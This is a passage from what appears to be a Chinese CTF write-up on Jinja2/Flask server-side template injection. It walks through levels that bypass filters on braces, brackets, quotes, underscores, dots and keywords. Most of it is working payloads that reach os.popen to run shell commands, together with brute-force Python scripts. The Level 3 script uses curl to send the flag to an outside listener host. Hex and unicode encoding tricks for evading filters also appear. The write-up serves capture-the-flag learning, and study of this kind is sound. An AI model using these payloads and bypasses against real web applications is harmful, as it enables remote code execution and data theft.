<p><code>{{&quot;&quot;.__class__.__base__.__subclasses__()[132].__init__.__globals__[&#39;popen&#39;](&#39;cat flag&#39;).read()}}</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210927112712493.png" srcset="/img/loading.gif" lazyload alt="image-20210927112712493"></p>
<h3 id="拓展"><a href="#拓展" class="headerlink" title="拓展"></a>拓展</h3><p>由于程序并没有对输入的内容进行任何判断和过滤,所以我们可以直接插入一段通用payload代码段,</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;% <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;<br>&#123;% <span class="hljs-keyword">if</span> c.__name__ == <span class="hljs-string">&#x27;catch_warnings&#x27;</span> %&#125;<br>  &#123;% <span class="hljs-keyword">for</span> b <span class="hljs-keyword">in</span> c.__init__.__globals__.values() %&#125;<br>  &#123;% <span class="hljs-keyword">if</span> b.__class__ == &#123;&#125;.__class__ %&#125;<br>    &#123;% <span class="hljs-keyword">if</span><span class="hljs-string">&#x27;eval&#x27;</span> <span class="hljs-keyword">in</span> b.keys() %&#125;<br>      &#123;&#123;b[<span class="hljs-string">&#x27;eval&#x27;</span>](<span class="hljs-string">&#x27;__import__(&quot;os&quot;).popen(&quot;calc&quot;).read()&#x27;</span>) &#125;&#125;<br>    &#123;% endif %&#125;<br>  &#123;% endif %&#125;<br>  &#123;% endfor %&#125;<br>&#123;% endif %&#125;<br>&#123;% endfor %&#125;<br></code></pre></td></tr></table></figure>

<p>但是我这里没打通.后来在开服务的机器上查了下发现没有 <code>catch_warnings</code>这个类.也懒的改了,感兴趣的可以试试.</p>
<h2 id="Level-2-bypass"><a href="#Level-2-bypass" class="headerlink" title="Level 2 bypass {{"></a>Level 2 bypass {{</h2><p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210924190118628.png" srcset="/img/loading.gif" lazyload alt="image-20210924190118628"></p>
<p><code>{{</code>被ban了,不过<code>{% %}</code>可以使用,使用<code>{% %}</code>进行盲打</p>
<blockquote>
<p>{% %} 是属于flask的控制语句,且以{% end… %}结尾,可以通过在控制语句定义变量或者写循环,判断.</p>
<p>详细内容可前往 <a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/templates/">Jinja2 模板官方文档</a>进行了解</p>
</blockquote>
<p>写个盲注脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&quot;http://192.168.0.108:5001/level/2&quot;</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">300</span>):<br>	<span class="hljs-keyword">try</span>:<br>		data = &#123;<span class="hljs-string">&quot;code&quot;</span>: <span class="hljs-string">&#x27;&#123;% if &quot;&quot;.__class__.__base__.__subclasses__()[&#x27;</span> + <span class="hljs-built_in">str</span>(i) + <span class="hljs-string">&#x27;].__init__.__globals__[&quot;popen&quot;](&quot;cat flag&quot;).read() %&#125;payload&#123;% endif %&#125;&#x27;</span>&#125;<br>		response = requests.post(url,data=data)<br>		<span class="hljs-keyword">if</span> response.status_code == <span class="hljs-number">200</span>:<br>			<span class="hljs-keyword">if</span> <span class="hljs-string">&quot;payload&quot;</span> <span class="hljs-keyword">in</span> response.text:<br>				<span class="hljs-built_in">print</span>(i,<span class="hljs-string">&quot;---&gt;&quot;</span>,data)<br>				<span class="hljs-keyword">break</span><br>	<span class="hljs-keyword">except</span> :<br>		<span class="hljs-keyword">pass</span><br><br><span class="hljs-comment"># 结果为 132 ---&gt; &#123;&#x27;code&#x27;: &#x27;&#123;% if &quot;&quot;.__class__.__base__.__subclasses__()[132].__init__.__globals__[&quot;popen&quot;](&quot;cat flag&quot;).read() %&#125;payload&#123;% endif %&#125;&#x27;&#125;</span><br><br></code></pre></td></tr></table></figure>

<p>脚本结果说明<code>132索引</code>能够执行代码,配合<code>{%print(code)%}</code>,拿到flag</p>
<p><code>{%print(&quot;&quot;.__class__.__base__.__subclasses__()[132].__init__.__globals__[&quot;popen&quot;](&quot;cat flag&quot;).read() )%}</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210927112343806.png" srcset="/img/loading.gif" lazyload alt="image-20210927112343806"></p>
<h3 id="拓展-1"><a href="#拓展-1" class="headerlink" title="拓展"></a>拓展</h3><p>除了能够使用<code>{%print()%}</code> 直接输出内容外,还可以使用<code>popen(&#39;cat flag&#39;).read(num)</code> 进行内容爆破.</p>
<p>如<code>popen(&#39;cat flag&#39;).read(1)</code>则表示内容的第一位,<code>popen(&#39;cat flag&#39;).read(2)</code>表示内容的前两位,依次类推.</p>
<h2 id="Level-3"><a href="#Level-3" class="headerlink" title="Level 3"></a>Level 3</h2><p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210924190126091.png" srcset="/img/loading.gif" lazyload alt="image-20210924190126091"></p>
<p>这题一开始没懂什么意思,看了源码才理解</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">level3</span>(<span class="hljs-params">code</span>):</span><br>    <span class="hljs-keyword">try</span>:<br>        render_template_string(code)<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;correct&quot;</span><br>    <span class="hljs-keyword">except</span> Exception:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;wrong&quot;</span><br></code></pre></td></tr></table></figure>

<p>对输入的字符串进行渲染,如果渲染异常返回wrong,渲染正确返回correct.</p>
<p>由于没有任何回显,可以写个脚本盲打</p>
<p>脚本内容如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&quot;http://192.168.0.108:5001/level/3&quot;</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">300</span>):<br>	<span class="hljs-keyword">try</span>:<br>		data = &#123;<span class="hljs-string">&quot;code&quot;</span>: <span class="hljs-string">&#x27;&#123;&#123;&quot;&quot;.__class__.__base__.__subclasses__()[&#x27;</span> + <span class="hljs-built_in">str</span>(i) + <span class="hljs-string">&#x27;].__init__.__globals__[&quot;popen&quot;](&quot;curl http://192.168.0.105:8081/`cat flag`&quot;).read()&#125;&#125;&#x27;</span>&#125;<br>		response = requests.post(url,data=data)<br>	<span class="hljs-keyword">except</span> :<br>		<span class="hljs-keyword">pass</span><br></code></pre></td></tr></table></figure>

<p> 在本地开个监听,</p>
<p>运行脚本,拿到flag</p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210927155336932.png" srcset="/img/loading.gif" lazyload alt="image-20210927155336932"></p>
<h2 id="Level-4-bypass"><a href="#Level-4-bypass" class="headerlink" title="Level 4 bypass [  ]"></a>Level 4 bypass [  ]</h2><p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210924190136543.png" srcset="/img/loading.gif" lazyload alt="image-20210924190136543"><br>初步尝试后,发现过滤了<code>[ ]</code>,其余没有任何过滤,此处可以使用<code>__getitem__()</code>绕过</p>
<blockquote>
<p>__getitem__() 是python的一个魔法方法,当对列表使用时,传入整数返回列表对应索引的值;对字典使用时,传入字符串,返回字典相应键所对应的值.</p>
</blockquote>
<p>简单更改 <code>Level 1</code>的脚本用于本题</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&quot;http://192.168.0.108:5001/level/4&quot;</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">300</span>):<br>	data = &#123;<span class="hljs-string">&quot;code&quot;</span>: <span class="hljs-string">&#x27;&#123;&#123;&quot;&quot;.__class__.__base__.__subclasses__().__getitem__(&#x27;</span>+ <span class="hljs-built_in">str</span>(i) +<span class="hljs-string">&#x27;)&#125;&#125;&#x27;</span>&#125; <br>	<span class="hljs-keyword">try</span>:<br>		response = requests.post(url,data=data)<br>		<span class="hljs-keyword">if</span> response.status_code == <span class="hljs-number">200</span>:<br>			<span class="hljs-keyword">if</span> <span class="hljs-string">&quot;_wrap_close&quot;</span> <span class="hljs-keyword">in</span> response.text:<br>				<span class="hljs-built_in">print</span>(i,<span class="hljs-string">&quot;-----&gt;&quot;</span>,response.text)<br>				<span class="hljs-keyword">break</span><br>	<span class="hljs-keyword">except</span> :<br>		<span class="hljs-keyword">pass</span><br><span class="hljs-comment"># 结果  132 -----&gt; Hello &amp;lt;class &amp;#39;os._wrap_close&amp;#39;&amp;gt;</span><br></code></pre></td></tr></table></figure>

<p>可以看到列表132的索引位置出现了可利用的类,直接构造payload,拿到flag</p>
<p><code>{{&#39;&#39;.__class__.__base__.__subclasses__().__getitem__(132).__init__.__globals__.__getitem__(&#39;popen&#39;)(&#39;cat flag&#39;).read()}}</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210927131713503.png" srcset="/img/loading.gif" lazyload alt="image-20210927131713503"></p>
<h2 id="Level-5-bypass-‘-“"><a href="#Level-5-bypass-‘-“" class="headerlink" title="Level 5 bypass  ‘   “"></a>Level 5 bypass  ‘   “</h2><p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210925232814991.png" srcset="/img/loading.gif" lazyload alt="image-20210925232814991"><br>初步尝试发现只过滤了<code>&#39; &quot;</code>,其余没有任何过滤,此处可以使用<code>request.args</code>绕过.</p>
<blockquote>
<p>在搭建flask时,大多数程序内部都会使用 flask的request来解析get请求.此出我们就可以通过构造带参数的url,配合 request.args 获取构造参数的内容来绕过限制</p>
</blockquote>
<p>同样使用 <code>Level 1</code>的脚本跑出可利用类的索引为132,构造如下payload,拿到flag</p>
<p><code>{{().__class__.__base__.__subclasses__()[132].__init__.__globals__[request.args.a](request.args.b).read()}}</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210925234522328.png" srcset="/img/loading.gif" lazyload alt="image-20210925234522328"></p>
<h3 id="拓展-2"><a href="#拓展-2" class="headerlink" title="拓展"></a>拓展</h3><p>既然能够通过<code>request.args</code>获取get参数构造payload,那能否通过post提交内容构造payload呢.答案是肯定的,除此之外,还能通过cookie传入等.读者们可以亲自动手尝试利用<code>request.post</code>或<code>request.cookie</code>的方法绕过本题.</p>
<blockquote>
<p>request 代码详细内容可前往<a target="_blank" rel="noopener" href="https://dormousehole.readthedocs.io/en/latest/api.html#flask.request">官方文档</a>自行了解</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python">request.args.key   	 获取get传入的key的值<br>request.values.x1 	 所有参数<br>request.cookies      获取cookies传入参数<br>request.headers      获取请求头请求参数<br>request.form.key   	 获取post传入参数	(Content-<span class="hljs-type">Type</span>:applicaation/x-www-form-urlencoded或multipart/form-data)<br>request.data  		 获取post传入参数	(Content-<span class="hljs-type">Type</span>:a/b)<br>request.json		 获取post传入json参数  (Content-<span class="hljs-type">Type</span>: application/json)<br></code></pre></td></tr></table></figure>



<h2 id="Level-6-bypass"><a href="#Level-6-bypass" class="headerlink" title="Level 6 bypass _"></a>Level 6 bypass _</h2><p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210926103636017.png" srcset="/img/loading.gif" lazyload alt="image-20210926103636017"></p>
<p>初步尝试发现过滤了<code>_</code>,其余没有任何过滤,此处可以使用过滤器<code>| attr()</code>绕过.</p>
<h3 id="关于过滤器"><a href="#关于过滤器" class="headerlink" title="关于过滤器"></a>关于过滤器</h3><p><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#filters">官方链接</a></p>
<pre><code>1. 过滤器通过管道符号（|）与变量连接,并且在括号中可能有可选的参数
2. 可以链接到多个过滤器.一个滤波器的输出将应用于下一个过滤器.
</code></pre>
<p>搬一下官方所给的内置过滤器</p>
<table>
<thead>
<tr>
<th><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.abs"><code>abs()</code></a></th>
<th><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.float"><code>float()</code></a></th>
<th><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.lower"><code>lower()</code></a></th>
<th><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.round"><code>round()</code></a></th>
<th><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.tojson"><code>tojson()</code></a></th>
</tr>
</thead>
<tbody><tr>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.attr"><code>attr()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.forceescape"><code>forceescape()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.map"><code>map()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.safe"><code>safe()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.trim"><code>trim()</code></a></td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.batch"><code>batch()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.format"><code>format()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.max"><code>max()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.select"><code>select()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.truncate"><code>truncate()</code></a></td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.capitalize"><code>capitalize()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.groupby"><code>groupby()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.min"><code>min()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.selectattr"><code>selectattr()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.unique"><code>unique()</code></a></td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.center"><code>center()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.indent"><code>indent()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.pprint"><code>pprint()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.slice"><code>slice()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.upper"><code>upper()</code></a></td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.default"><code>default()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.int"><code>int()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.random"><code>random()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.sort"><code>sort()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.urlencode"><code>urlencode()</code></a></td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.dictsort"><code>dictsort()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.join"><code>join()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.reject"><code>reject()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.string"><code>string()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.urlize"><code>urlize()</code></a></td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.escape"><code>escape()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.last"><code>last()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.rejectattr"><code>rejectattr()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.striptags"><code>striptags()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.wordcount"><code>wordcount()</code></a></td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.filesizeformat"><code>filesizeformat()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.length"><code>length()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.replace"><code>replace()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.sum"><code>sum()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.wordwrap"><code>wordwrap()</code></a></td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.first"><code>first()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.list"><code>list()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.reverse"><code>reverse()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.title"><code>title()</code></a></td>
<td><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#jinja-filters.xmlattr"><code>xmlattr()</code></a></td>
</tr>
</tbody></table>
<p><em><strong>常用过滤器</strong></em></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python">length() <span class="hljs-comment"># 获取一个序列或者字典的长度并将其返回</span><br><br><span class="hljs-built_in">int</span>()：<span class="hljs-comment"># 将值转换为int类型；</span><br><br><span class="hljs-built_in">float</span>()：<span class="hljs-comment"># 将值转换为float类型；</span><br><br>lower()：<span class="hljs-comment"># 将字符串转换为小写；</span><br><br>upper()：<span class="hljs-comment"># 将字符串转换为大写；</span><br><br>reverse()：<span class="hljs-comment"># 反转字符串；</span><br><br>replace(value,old,new)： <span class="hljs-comment"># 将value中的old替换为new</span><br><br><span class="hljs-built_in">list</span>()：<span class="hljs-comment"># 将变量转换为列表类型；</span><br><br>string()：<span class="hljs-comment"># 将变量转换成字符串类型；</span><br><br>join()：<span class="hljs-comment"># 将一个序列中的参数值拼接成字符串,通常有python内置的dict()配合使用</span><br><br>attr(): <span class="hljs-comment"># 获取对象的属性</span><br></code></pre></td></tr></table></figure>



<p>回到原题,本题我们利用到的过滤器为<code>attr()</code>.其用法为 <code>foo|attr(&quot;bar&quot;)</code>,结果等价于<code>foo.bar</code></p>
<p>我们可以利用<code>request.args</code>向attr里面传入参数,</p>
<p>但这里再介绍一种编码绕过,</p>
<p><code>__class__ =&gt; \x5f\x5fclass\x5f\x5f</code></p>
<p>其中<code>_ </code>的十六进制编码为<code>\x5f</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210926104739695.png" srcset="/img/loading.gif" lazyload alt="image-20210926104739695"></p>
<p>构造payload,拿到flag</p>
<blockquote>
<p>paload原型: ().__class__.__base__.__subclasses__()[132].__init__.__globals__[‘open’](‘cat flag’).read()</p>
</blockquote>
<p><code>{{()|attr(&quot;\x5f\x5fclass\x5f\x5f&quot;)|attr(&quot;\x5f\x5fbase\x5f\x5f&quot;)|attr(&quot;\x5f\x5fsubclasses\x5f\x5f&quot;)()|attr(&quot;\x5f\x5fgetitem\x5f\x5f&quot;)(132)|attr(&quot;\x5f\x5finit\x5f\x5f&quot;)|attr(&quot;\x5f\x5fglobals\x5f\x5f&quot;)|attr(&quot;\x5f\x5fgetitem\x5f\x5f&quot;)(&#39;popen&#39;)(&#39;cat flag&#39;)|attr(&quot;read&quot;)()}}</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210926111523826.png" srcset="/img/loading.gif" lazyload alt="image-20210926111523826"></p>
<h3 id="拓展-3"><a href="#拓展-3" class="headerlink" title="拓展"></a>拓展</h3><p>除了可以使用十六进制编码外,还可以使用unioncode</p>
<p><code>__class__</code>=&gt;<code>\u005f\u005f\u0063\u006c\u0061\u0073\u0073\u005f\u005f</code></p>
<p><a target="_blank" rel="noopener" href="https://buaq.net/go-74232.html">例子</a>:</p>
<p><code>{{()|attr(&quot;__class__&quot;)|attr(&quot;__base__&quot;)|attr(&quot;__subclasses__&quot;)()|attr(&quot;__getitem__&quot;)(77)|attr(&quot;__init__&quot;)|attr(&quot;__globals__&quot;)|attr(&quot;__getitem__&quot;)(&quot;os&quot;)|attr(&quot;popen&quot;)(&quot;ls&quot;)|attr(&quot;read&quot;)()}}</code></p>
<p><em><strong>Unicode编码后:</strong></em></p>
<p><code>{{()|attr(&quot;\u005f\u005f\u0063\u006c\u0061\u0073\u0073\u005f\u005f&quot;)|attr(&quot;\u005f\u005f\u0062\u0061\u0073\u0065\u005f\u005f&quot;)|attr(&quot;\u005f\u005f\u0073\u0075\u0062\u0063\u006c\u0061\u0073\u0073\u0065\u0073\u005f\u005f&quot;)()|attr(&quot;\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f&quot;)(77)|attr(&quot;\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f&quot;)|attr(&quot;\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f&quot;)|attr(&quot;\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f&quot;)(&quot;os&quot;)|attr(&quot;popen&quot;)(&quot;ls&quot;)|attr(&quot;read&quot;)()}}</code></p>
<h2 id="Level-7-bypass"><a href="#Level-7-bypass" class="headerlink" title="Level 7 bypass ."></a>Level 7 bypass .</h2><p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210926111709414.png" srcset="/img/loading.gif" lazyload alt="image-20210926111709414"><br>初步尝试发现过滤了<code>.</code>,其余没有任何过滤,此处可以使用<code>[]</code>绕过.</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#variables">You can use a dot (<code>.</code>) to access attributes of a variable in addition to the standard Python <code>__getitem__</code> “subscript” syntax (<code>[]</code>).</a></p>
<p>python语法除了可以使用点 <code>.</code>来访问对象属性外,还可以使用中括号<code>[]</code>.同样也可以使用__getitem__</p>
</blockquote>
<p>构造payload,拿到flag</p>
<p><code>{{()[&#39;__class__&#39;][&#39;__base__&#39;][&#39;__subclasses__&#39;]()[132][&#39;__init__&#39;][&#39;__globals__&#39;][&#39;popen&#39;](&#39;cat flag&#39;)[&#39;read&#39;]()}}</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210926112300549.png" srcset="/img/loading.gif" lazyload alt="    "></p>
<h2 id="Level-8-bypass-keywords"><a href="#Level-8-bypass-keywords" class="headerlink" title="Level 8 bypass keywords"></a>Level 8 bypass keywords</h2><p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210926130328927.png" srcset="/img/loading.gif" lazyload alt="image-20210926130328927"></p>
<p>从提示可以看到ban了许多关键字.此处可以使用<code>字符串拼接</code>绕过</p>
<p>构造payload,拿到flag</p>
<p><code>{{()[&#39;__cla&#39;&#39;ss__&#39;][&#39;__ba&#39;&#39;se__&#39;][&#39;__subcla&#39;&#39;sses__&#39;]()[132][&#39;__in&#39;&#39;it__&#39;][&#39;__glo&#39;&#39;bals__&#39;][&#39;popen&#39;](&#39;cat flag&#39;)[&#39;read&#39;]()}}</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210926143626497.png" srcset="/img/loading.gif" lazyload alt="image-20210926143626497"></p>
<h3 id="拓展-4"><a href="#拓展-4" class="headerlink" title="拓展"></a>拓展</h3><p>除了使用简单的字符串拼接方式外,还可以使用:</p>
<ol>
<li><p>字符编码(上面介绍过,就不再提了)</p>
</li>
<li><p>使用<code>Jinjia2</code>中的<code>~</code>进行拼接.如<code>{%set a=&quot;__cla&quot;%}{%set aa=&quot;ss__&quot;%}{{a~aa}}</code></p>
</li>
<li><p>使用<code>join</code>过滤器.例如使用<code>{%set a=dict(__cla=a,ss__=a)|join%}{{a}}</code>,会将<code>__cla</code>和<code>ss__</code>拼接在一起,或者<code>{%set a=[&#39;__cla&#39;,&#39;ss__&#39;]|join%}{{a}}</code></p>
</li>
<li><p>使用<code>reverse</code>过滤器.如<code>{%set a=&quot;__ssalc__&quot;|reverse%}{{a}}</code></p>
</li>
<li><p>使用<code>replace</code>过滤器.如<code>{%set a=&quot;__claee__&quot;|replace(&quot;ee&quot;,&quot;ss&quot;)%}{{a}}</code></p>
</li>
<li><p>利用python的<code>char()</code>.例如</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;% <span class="hljs-built_in">set</span> <span class="hljs-built_in">chr</span>=url_for.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>].<span class="hljs-built_in">chr</span> %&#125;<br>&#123;&#123;<span class="hljs-string">&quot;&quot;</span>[<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)%2bchr(<span class="hljs-number">95</span>)%2bchr(<span class="hljs-number">99</span>)%2bchr(<span class="hljs-number">108</span>)%2bchr(<span class="hljs-number">97</span>)%2bchr(<span class="hljs-number">115</span>)%2bchr(<span class="hljs-number">115</span>)%2bchr(<span class="hljs-number">95</span>)%2bchr(<span class="hljs-number">95</span>)]&#125;&#125;<br></code></pre></td></tr></table></figure>

<p>…</p>
</li>
</ol>
